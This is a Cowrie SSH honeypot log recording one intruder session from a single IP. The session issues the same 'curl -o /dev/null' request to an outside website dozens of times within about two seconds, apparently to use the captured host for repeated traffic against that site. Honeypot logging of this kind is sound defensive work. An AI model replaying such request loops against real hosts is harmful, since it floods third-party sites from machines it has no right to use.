{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.173958Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.174768Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.212727Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.213553Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.252149Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.253251Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.291528Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.292533Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.334972Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.335835Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.373282Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.374021Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.410697Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.411624Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.448285Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.449229Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.485917Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.486722Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.525424Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.526182Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.565589Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.566567Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.603658Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.604629Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.646899Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.647841Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.685298Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.686784Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.725772Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.726538Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.768423Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.769184Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.808587Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.809377Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.846884Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.847731Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.885066Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.886000Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.926804Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.927598Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.969440Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.970244Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.008298Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.009588Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.047792Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.048662Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.087271Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.088269Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.130682Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.131748Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.170842Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.171653Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.210472Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.211298Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.250259Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.251092Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.287565Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.288397Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.329647Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.330414Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.367366Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.368151Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.405181Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.406038Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.443064Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.444160Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.481700Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.482601Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.521475Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.522284Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.566231Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.567227Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.603947Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.604707Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.641877Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.642466Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.679114Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.679814Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.716111Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.716820Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.755061Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.755788Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.794471Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.795274Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.831846Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.832646Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.869708Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.870740Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.909491Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.910223Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.946939Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.947728Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:36.994157Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:36.995763Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.034420Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.035244Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.071699Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.072246Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.109046Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.110318Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.148817Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.149903Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.187186Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.188109Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.225593Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.226483Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.263501Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.264305Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.302534Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.303452Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.340599Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.341409Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.378391Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.379212Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.416909Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.417935Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.454822Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.455621Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.492497Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.493414Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.530263Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.531426Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.569613Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.570590Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.607962Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.608994Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.645879Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.646741Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.687421Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
